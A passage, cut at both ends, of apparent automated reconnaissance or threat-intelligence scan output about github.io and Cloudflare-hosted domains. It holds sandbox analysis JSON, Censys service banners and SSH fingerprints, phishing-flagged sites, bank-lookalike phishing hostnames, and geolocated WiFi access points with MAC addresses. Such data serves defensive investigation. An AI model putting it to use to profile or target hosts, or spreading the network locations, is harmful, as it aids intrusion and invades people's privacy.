u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://kurt-defreitas.github.io/img/placeholder.svg"\n Pattern match: "https://kurt-defreitas.github.io"\n Pattern match: "isdomainmigratedtruewww.msn.com/102573378790431061301290557634631025074*"\n Pattern match: "www.msn.com/"\n Pattern match: "MUIDB3901E857A0CA662738CBFA56A18667BBieonline.microsoft.com/9216413533568031103545290260759631025074*"\n Pattern match: "MUID3901E857A0CA662738CBFA56A18667BBmicrosoft.com/1025411295705631056689247978600330978218*SRCHDAF=NOFORMmicrosoft.com/1024194638604831125287247978600330978218*SRCHUIDV=2&GUID=A9F735962E2A42C3AFD3CAEB5B5F826B&dmnchg=1microsoft.com/1024194638604831125287247"\n Heuristic match: "kurt-defreitas.github.io"\n Pattern match: "kurt-defreitas.github.io/img/placeholder.svg"\n Heuristic match: "urt-defreitas.github.io"\n Pattern match: "https://kurt-defreit"\n Pattern match: "thub.io/img/placeholder.svg"\n Heuristic match: ".VBE;.JS;.JSE;.WSF;.WSH;.MS"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-14', u'name': u'Found potential IP address in binary/memory', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'Potential IP "5.1.0.0" found in string "Microsoft.Windows.Shell.rundll32,processorArchitecture="amd64",type="win32",version="5.1.0.0"C:\\Windows\\system32\\rundll32.exe"\n Potential IP "5.1.0.0" found in string "Microsoft.Windows.InetCore.ieframe,processorArchitecture="amd64",type="win32",version="5.1.0.0"C:\\Windows\\system32\\IEFRAME.dll"\n Potential IP "5.1.0.0" found in string "version="5.1.0.0""'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-1', u'name': u'Sample was identified as clean by Antivirus engines', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 12, u'description': u'0/88 Antivirus vendors marked sample as malicious (0% detection rate)'}], u'threat_level': 0, u'size': None, u'job_id': u'642d780eb081708a1d0cd972', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [{u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'suspicious_identifiers': [], u'attck_id': u'T1071', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Application Layer Protocol', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 3, u'suspicious_identifiers_count': 0}, {u'parent': {u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'technique': u'Application Layer Protocol', u'attck_id': u'T1071'}, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'suspicious_identifiers': [], u'attck_id': u'T1071.004', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'DNS', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}, {u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'suspicious_identifiers': [], u'attck_id': u'T1105', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Ingress Tool Transfer', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}], u'certificates': [], u'hosts': [u'185.199.109.153'], u'sha256': u'd84ad76dbc17dc4539d49469071a2427b7e79fdc246d68b969e9de0d1e855535', u'sha512': u'b3210c962393967f3e6fe80ee046138402e981859fad47091c2a0e01dcac772aa503fd055cb12c62fbab75f63ef3b92e9749e878914ba9e90fc11586407c6113', u'image_file_characteristics': [], u'submissions': [{u'url': u'https://kurt-defreitas.github.io/img/placeholder.svg', u'submission_id': u'642d780eb081708a1d0cd973', u'created_at': u'2023-04-05T13:30:54+00:00', u'filename': None}], u'analysis_start_time': u'2023-04-05T13:30:54+00:00', u'tags': [], u'imphash': u'Unknown', u'total_network_connections': 1, u'av_detect': 0, u'machine_learning_models': [], u'total_signatures': 8, u'image_base': None, u'error_origin': None, u'ssdeep': u'Unknown', u'entrypoint_section': None, u'md5': u'd1ce50a9c575b4cf671aba5ee730067f', u'network_mode': u'default', u'processes': [], u'sha1': u'c3d81748524ef71e72b65a4a2266ceede7285d7d', u'url_analysis': True, u'type': None, u'file_metadata': None, u'dll_characteristics': [], u'vx_family': None, u'environment_description': u'Windows 7 64 bit', u'verdict': u'no specific threat', u'minor_os_version': None, u'domains': [u'kurt-defreitas.github.io'], u'extracted_files': [], u'type_short': []}] | 185.199.109.153 |
| 2023-05-12 03:01:40 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.180): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:54:38 | Open TCP Port Banner | No | Censys | 0 | 0 | 3 | 0 | None | HTTP/1.1 403 Forbidden
Date: <REDACTED>
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 7c5ad421cd00112e-ORD
Content-Encoding: gzip
| 172.67.168.252 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | 410HowardStudios (Net ID: 00:02:2D:00:25:63) | 37.7813933,-122.3918002 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | hackster (Category: coding)
https://www.hackster.io/login | login |
| 2023-05-12 03:09:27 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | cdnjs.cloudflare.com | 188.114.97.1 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | nocwap (Net ID: 00:04:5A:CC:3F:27) | 33.6170672,-111.90564645297056 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 2 | 0 | None | x-proxy-cache: MISS | {"content-length": "690", "via": "1.1 varnish", "vary": "Accept-Encoding", "etag": "W/\"642b434c-4fb\"", "x-cache-hits": "1", "cache-control": "max-age=600", "x-served-by": "cache-ewr18140-EWR", "x-cache": "HIT", "x-github-request-id": "1AD4:4FA0:AFAB37:106D10A:645DA7F4", "accept-ranges": "bytes", "expires": "Fri, 12 May 2023 02:54:04 GMT", "last-modified": "Mon, 03 Apr 2023 21:21:16 GMT", "x-fastly-request-id": "47e9025f17d9e6e936d804b3c00d7989ec4a827a", "date": "Fri, 12 May 2023 02:54:12 GMT", "access-control-allow-origin": "*", "x-proxy-cache": "MISS", "content-encoding": "gzip", "age": "559", "x-timer": "S1683860053.987504,VS0,VE2", "server": "GitHub.com", "connection": "keep-alive", "content-type": "text/html; charset=utf-8"} |
| 2023-05-12 03:01:32 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.80): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:13:04 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [001wwang.github.io]
https://www.openphish.com/feed.txt | 001wwang.github.io |
| 2023-05-12 03:00:30 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | aes256-gcm@openssh.com | {"operating_system": {"vendor": "Ubuntu", "product": "Linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, "last_updated_at": "2023-05-11T07:25:44.787Z", "ip": "46.101.229.70", "labels": ["remote-access"], "location_updated_at": "2023-05-01T12:20:02.406356Z", "autonomous_system_updated_at": "2023-05-01T12:20:02.407454Z", "location": {"province": "Hesse", "city": "Frankfurt am Main", "country": "Germany", "coordinates": {"latitude": 50.11552, "longitude": 8.68417}, "postal_code": "60306", "country_code": "DE", "timezone": "Europe/Berlin", "continent": "Europe"}, "dns": {"records": {"www3citi5ensbnk01.nerdpol.ovh": {"record_type": "A", "resolved_at": "2023-05-08T21:52:09.615214562Z"}, "www3citizensbnk01.ddns.net": {"record_type": "A", "resolved_at": "2023-04-03T07:30:40.764584949Z"}, "www3citlzensbnk.ddns.net": {"record_type": "A", "resolved_at": "2023-04-23T19:19:28.631638390Z"}, "chainsyncpages.ddns.net": {"record_type": "A", "resolved_at": "2023-04-05T19:58:37.967204478Z"}, "mail.46-101-229-70.cprapid.com": {"record_type": "A", "resolved_at": "2023-05-03T14:09:55.384272288Z"}, "jnbt05.easypanel.host": {"record_type": "A", "resolved_at": "2023-05-10T17:13:22.939829997Z"}, "intelligent-euclid.46-101-229-70.plesk.page": {"record_type": "A", "resolved_at": "2023-04-28T22:08:15.278436745Z"}, "www.46-101-229-70.cprapid.com": {"record_type": "A", "resolved_at": "2023-04-30T14:18:11.707553225Z"}, "46-101-229-70.cprapid.com": {"record_type": "A", "resolved_at": "2023-04-30T14:18:11.520320906Z"}}, "names": ["chainsyncpages.ddns.net", "www3citi5ensbnk01.nerdpol.ovh", "www3citizensbnk01.ddns.net", "www3citlzensbnk.ddns.net", "www.46-101-229-70.cprapid.com", "46-101-229-70.cprapid.com", "intelligent-euclid.46-101-229-70.plesk.page", "jnbt05.easypanel.host", "mail.46-101-229-70.cprapid.com"]}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "labels": ["remote-access"], "truncated": false, "service_name": "SSH", "_decoded": "ssh", "banner_hashes": ["sha256:74d4fa601a4a1f78b519a7bc16ea591fab7d4addbe589649de627c34c4e0d38a"], "source_ip": "167.94.145.60", "extended_service_name": "SSH", "observed_at": "2023-05-11T07:25:44.640117776Z", "banner_hex": "5353482d322e302d4f70656e5353485f382e397031205562756e74752d337562756e7475302e31", "perspective_id": "PERSPECTIVE_ORANGE", "transport_fingerprint": {"raw": "28960,64,true,MSTNW,1460,false,false", "os": "Ubuntu / Debian / CentOS", "id": 72}, "banner": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1", "port": 22, "ssh": {"server_host_key": {"fingerprint_sha256": "654b926728b59e31856ca456546380aae9ad6f0105be964db40d456c35d8474b", "ecdsa_public_key": {"_encoding": {"b": "DISPLAY_BASE64", "gy": "DISPLAY_BASE64", "n": "DISPLAY_BASE64", "p": "DISPLAY_BASE64", "y": "DISPLAY_BASE64", "x": "DISPLAY_BASE64", "gx": "DISPLAY_BASE64"}, "b": "WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=", "curve": "P-256", "gy": "T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=", "gx": "axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=", "p": "/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=", "length": 256, "y": "b/8s4eFX87LHgM34ZW3g9GyhRKNQyQUUsPt17LQ/ZJc=", "x": "OF+EuiYliuprX40ENBhAbc+GOunuKTpVTjg/1oXm5JM=", "n": "/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE="}}, "algorithm_selection": {"server_to_client_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "host_key_algorithm": "ecdsa-sha2-nistp256", "client_to_server_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "kex_algorithm": "curve25519-sha256@libssh.org"}, "kex_init_message": {"host_key_algorithms": ["rsa-sha2-512", "rsa-sha2-256", "ecdsa-sha2-nistp256", "ssh-ed25519"], "client_to_server_compression": ["none", "zlib@openssh.com"], "server_to_client_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "client_to_server_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"], "first_kex_follows": false, "kex_algorithms": ["curve25519-sha256", "curve25519-sha256@libssh.org", "ecdh-sha2-nistp256", "ecdh-sha2-nistp384", "ecdh-sha2-nistp521", "sntrup761x25519-sha512@openssh.com", "diffie-hellman-group-exchange-sha256", "diffie-hellman-group16-sha512", "diffie-hellman-group18-sha512", "diffie-hellman-group14-sha256"], "server_to_client_compression": ["none", "zlib@openssh.com"], "client_to_server_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "server_to_client_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"]}, "endpoint_id": {"comment": "Ubuntu-3ubuntu0.1", "_encoding": {"raw": "DISPLAY_UTF8"}, "protocol_version": "2.0", "software_version": "OpenSSH_8.9p1", "raw": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1"}, "hassh_fingerprint": "699519fdcc30cbcd093d5cd01e4b1d56"}, "software": [{"source": "OSI_APPLICATION_LAYER", "product": "openssh", "other": {"comment": "Ubuntu-3ubuntu0.1"}}, {"source": "OSI_TRANSPORT_LAYER", "product": "linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:*:linux:*:*:*:*:*:*:*:*"}, {"product": "Linux", "vendor": "Ubuntu", "source": "OSI_APPLICATION_LAYER", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, {"product": "OpenSSH", "vendor": "OpenBSD", "version": "8.9p1", "source": "OSI_APPLICATION_LAYER", "other": {"family": "OpenSSH"}, "uniform_resource_identifier": "cpe:2.3:a:openbsd:openssh:8.9p1:*:*:*:*:*:*:*", "part": "a"}]}], "autonomous_system": {"bgp_prefix": "46.101.128.0/17", "country_code": "US", "asn": 14061, "name": "DIGITALOCEAN-ASN", "description": "DIGITALOCEAN-ASN"}} |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | HOME-51D2 (Net ID: 00:1D:D1:0A:51:D0) | 32.8608, -79.9746 |
| 2023-05-12 02:53:42 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 185.199.109.153:443 | 185.199.109.153 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | <no ssid> (Net ID: 00:02:2D:03:B4:A0) | 37.7642, -122.3993 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | pgi50 (Net ID: 00:01:21:10:7A:20) | 37.7813933,-122.3918002 |
| 2023-05-12 02:46:34 | Internet Name | No | VirusTotal | 0 | 0 | 2 | 0 | None | funny.battleb0t.xyz | www.battleb0t.xyz |
| 2023-05-12 02:54:44 | HTTP Headers | No | Censys | 0 | 0 | 3 | 0 | None | {"Content_Length": ["0"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Nf_Request_Id": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8"}, "X_Nf_Request_Id": ["01H06KNWSV7RTZ7MSA7BNCK843"], "Date": ["<REDACTED>"], "Server": ["Netlify"]} | 35.229.48.116 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | ATT9wHk9D5 (Net ID: D4:B2:7A:4E:26:D2) | 37.751, -97.822 |
| 2023-05-12 03:27:54 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.138:8443 | 188.114.96.0/24 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | BJNPSETUP (Net ID: 00:00:85:F4:F3:43) | 41.8781, -87.6298 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | kristin (Net ID: 00:0C:41:84:68:1E) | 39.0469, -77.4903 |
| 2023-05-12 02:54:38 | Open TCP Port | No | Censys | 0 | 0 | 3 | 0 | None | 172.67.168.252:2053 | 172.67.168.252 |
| 2023-05-12 03:03:36 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 00steveng.github.io |
| 2023-05-12 03:01:40 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.179): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 54d382 (Net ID: F4:6B:EF:54:D3:86) | 37.751, -97.822 |
| 2023-05-12 03:22:54 | Open TCP Port | No | Pulsedive | 0 | 0 | 2 | 0 | None | 188.114.97.1:443 | 188.114.97.1 |
| 2023-05-12 03:16:12 | Similar Domain | Yes | Tool - DNSTwist | 0 | 0 | 1 | 0 | None | battlebot.xyz | battleb0t.xyz |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | cross-origin-embedder-policy: require-corp | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=ZnKgqHhkfhEMG0RRLEy55qXrIGT89PCJPvhlAxU1THPzwDrL5gc7PkT%2B%2FxSKq2nR5SYE1oIsFspz8pOEUKsQOZN%2FSfuF%2FMxnliSNjDjXg8QSfRLZrnIM0lr2QA%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:13 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f603759cec44a-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:13:10 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [01100111-01101001-01110100.github.io]
https://www.openphish.com/feed.txt | 01100111-01101001-01110100.github.io |
| 2023-05-12 02:47:06 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://app-mobile-link.ml', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'http://url1021.joinpreventor.com/ls/click?upn=bna4-2BmY1ITDZjl0PQKir67uPPI2f2DxWOATqx3-2Fj7OYylB8Hflza-2F4c-2BTJ51THm64bMitYJMpTuBxoVK0JwiPA-3D-3DbIZs_mSllOFscLbgTD69Yd5M4iZvJ2paH7zkSD0m2J2dAKbXAH-2BqpVRSKcCjXP2k6p2y4nrVy7lmBrfgOzMBh71z-2FxzpQdOSEWu-2BZu6bLzGdNpAef0msgWTQ8GjPF3HDwIREahUwNjJmuPNPOCq8kmJFsGovhuQHANzkUNF2qYZDjnaeii8u-2B4tCDbRuTvyHxW-2F4G4-2F8I34SGcemXBehR0ER9-2FOn27NKTXVFHKhuRFZGUzt5qNTOBOuOjmw9DiFzaj628S91bNxgYKtUY6ND6xDYvSswMqyTNX1SGlfzGDBI4KPIl1cR6mrPgDzb4lMqV1eoyIjMH1VfBoaIpPQIsSt-2FeLX6lXw-2BweMGQuDjIQ1gKTOo3gpd-2BPujm5M8OM3WO1y6kaT-2BHQiw25YdzyLgte2vg6SnLm5F0hYcK1FjLzKXxt7q61Y1Nl6A-2BBTdDOpidTdo4', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_cc4_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "IsoScope_cc4_IESQMMUTEX_0_519"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_cc4_IESQMMUTEX_0_303"\n "IsoScope_cc4_IE_EarlyTabStart_0xc0c_Mutex"\n "IsoScope_cc4_IESQMMUTEX_0_331"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3268"\n "Local\\ZonesCacheCounterMutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "UpdatingNewTabPageData"\n "IsoScope_cc4_ConnHashTable<3268>_HashTable_Mutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\VERMGMTBlockListFileMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"167.89.115.56:80"\n "52.25.204.60:443"\n "18.155.202.100:443"\n "142.251.214.138:443"\n "142.250.72.200:443"\n "54.237.133.81:443"\n "185.199.111.153:443"\n "108.138.245.23:443"\n "108.139.1.40:443"\n "157.240.22.25:443"\n "136.143.191.67:443"\n "142.251.214.131:443"\n "172.217.12.110:443"\n "18.155.202.12:443"\n "91.199.212.52:80"\n "204.141.43.48:443"\n "136.143.191.144:443"\n "136.143.190.97:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"url1021.joinpreventor.com"\n "crt.usertrust.com"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"crt.usertrust.com"\n "maciejsawicki.com"\n "salesiq.zoho.com"\n "salesiq.zohopublic.com"\n "url1021.joinpreventor.com"\n "vts.zohopublic.com"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar2FBD.tmp" as clean (type is "data")'}, {u'category': u'Pattern Matching', u'origin': u'YARA Signature', u'identifier': u'yara-104', u'name': u'YARA signature match - RC4 Encryption', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1486', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1486', u'relevance': 5, u'threat_level': 0, u'type': 13, u'description': u'YARA signature for RC4 encryption matched on process "00000000-00003968"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"5fc94f03728d607c48960ad7_nav-educational_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "5fb4d2b5847afb666a7db5b8_nav-kyb_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "5f774173a2f6f8ffce80d3d6_decor-rows_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "5fb4d2c73c18f306a879a966_nav-law_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "5fb4d2c8774cf47e14dd70e9_nav-telecommunications_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "5fb4d2b59f7e103028de58c7_nav-user-veritifcation_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "5fb4d2adbcece0bb48a61a5d_nav-driver-registration_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "5fb4d2b2bd7876b3f1ab0491_nav-identity-veritifcation_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "5fb4d2c87e98373560b7c150_nav-transport_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "625514f697cb9539930c08dc_arrow_lists_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "5ff61e333be007ebd657a9e2_Powerfull-notice_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "5fc071f4e509f3bc3acd619d_Check%20icon_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "5ff61e34886f01f4ab6763a4_Powerfull-political_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "5fb4d2c611b6f7021b7a90b6_nav-healthcare_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "5ff61e3603c269bbe2a4fd83_Powerfull-transactions_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "5f774173a2f6f8720a80d3d7_decor-dots_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "606cb3abf47891862f1bf393_icon-vimeo_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "63c5d39997f0b639e8d1db34_icon_solutions_4_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "5fc94f03a68318a6830bfa8d_nav-ecommerce_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "6307aad46dbfb3ff5914cc43_arrow_direction_right_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]'}, {u'category': u'Environment Awareness', u'origin': u'File/Memory', u'identifier': u'string-167', u'name': u'Contains ability to retrieve the contents of the STARTUPINFO structure (API string)', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1543', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1543', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'Observed API string:"GetStartupInfo" [Source: 00000000-00003968.00000000.67673.00491000.00000020.mdmp\n 00000000-00003968.00000000.67698.00491000.00000020.mdmp]'}, {u'category': u'Spyware/Information Retrieval', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'"GET /5f774172772fc1fb1fa10c12/5f774173a2f6f80a3d80d3be_twitter.png HTTP/1.1Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5Referer: https://preventor.com/solutions/preventor-namesAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: uploads-ssl.webflow.comDNT: 1Connection: Keep-Alive" (Indicator: "twitter")\n "GET /5f774172772fc1fb1fa10c12/606cb3a9126777b98ff68805_icon-youtube.png HTTP/1.1Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5Referer: https://preventor.com/solutions/preventor-namesAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 6.1; 